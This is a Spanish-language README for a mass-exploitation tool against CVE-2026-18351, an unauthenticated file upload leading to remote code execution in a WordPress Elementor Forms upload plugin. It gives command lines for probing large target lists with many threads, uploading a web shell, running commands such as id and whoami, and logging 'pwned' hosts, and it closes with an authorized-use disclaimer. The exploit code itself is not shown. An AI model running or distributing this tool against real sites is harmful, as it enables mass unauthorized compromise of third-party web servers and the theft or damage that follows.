Herramienta de explotación masiva para CVE-2026-18351, una carga arbitraria de archivos sin autenticación que conduce a RCE en Elementor Forms <= 1.6.0, con sondeo pasivo, carga de shell y ejecución de comandos.
Herramienta de explotación masiva para CVE-2026-18351 — Carga Arbitraria de Archivos No Autenticada → RCE en Drag and Drop File Upload for Elementor Forms <= 1.6.0.
crédito johenlastgen | telegram @johenlastgen | canal @jlgnetworkredirect
Sin dependencias externas — utiliza únicamente la biblioteca estándar de Python.
python3 --version # 3.6+
# Objetivo único — solo verificación pasiva (sin carga)
python3 mass.py --url http://target.com --check
# Objetivo único — explotar con comando predeterminado (id)
python3 mass.py --url http://target.com --cmd id
# Objetivo único — explotar con comando personalizado
python3 mass.py --url http://target.com --cmd whoami
# Objetivos masivos — verificación pasiva
python3 mass.py --list targets.txt --threads 50 --check
# Objetivos masivos — explotar
python3 mass.py --list targets.txt --threads 50 --cmd id
# Objetivos masivos — explotar con ajuste de tiempo de espera
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# Guardar registro completo
python3 mass.py --list targets.txt --output results.txt
# Guardar solo objetivos vulnerables
python3 mass.py --list targets.txt --output-vuln vuln.txt
# Guardar solo objetivos con RCE confirmado
python3 mass.py --list targets.txt --output-pwned pwned.txt
# Salida combinada
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| Opción | Descripción |
|---|---|
--url | URL de objetivo único |
--list FILE | Archivo que contiene URLs de objetivos (una por línea) |
--check | Solo sonda pasiva — sin carga de archivos |
--cmd CMD | Comando a ejecutar en el shell (predeterminado: id) |
--threads N | Número de hilos concurrentes (predeterminado: 20) |
--timeout N | Tiempo de espera por solicitud en segundos (predeterminado: 10) |
--output FILE | Guardar registro completo en archivo |
--output-vuln FILE | Guardar solo URLs de objetivos vulnerables en archivo |
--output-pwned FILE | Guardar solo objetivos con RCE confirmado en archivo |
| Estado | Significado |
|---|---|
PWNED | Shell cargado y RCE confirmado |
VULN-NO-EXEC | Carga aceptada pero la ejecución del shell falló |
PATCHED | Carga rechazada o nonce no encontrado |
ERROR | Fallo de red o de análisis |
Una URL por línea. Las líneas que comienzan con # se ignoran.
http://target1.com
https://target2.com
# this line is ignored
http://target3.com
Este proyecto se proporciona únicamente para evaluaciones de seguridad autorizadas, investigación de seguridad defensiva y validación de vulnerabilidades.
Al utilizar este software, usted confirma que cuenta con autorización explícita para evaluar los sistemas objetivo. El acceso no autorizado a sistemas informáticos está prohibido y puede violar las leyes aplicables.
El autor y los colaboradores no fomentan ni aprueban el uso no autorizado de este proyecto y no asumen ninguna responsabilidad ni obligación legal por cualquier uso indebido, daño o consecuencia legal derivada de su uso.
JohenLastGen — JLG NETWORK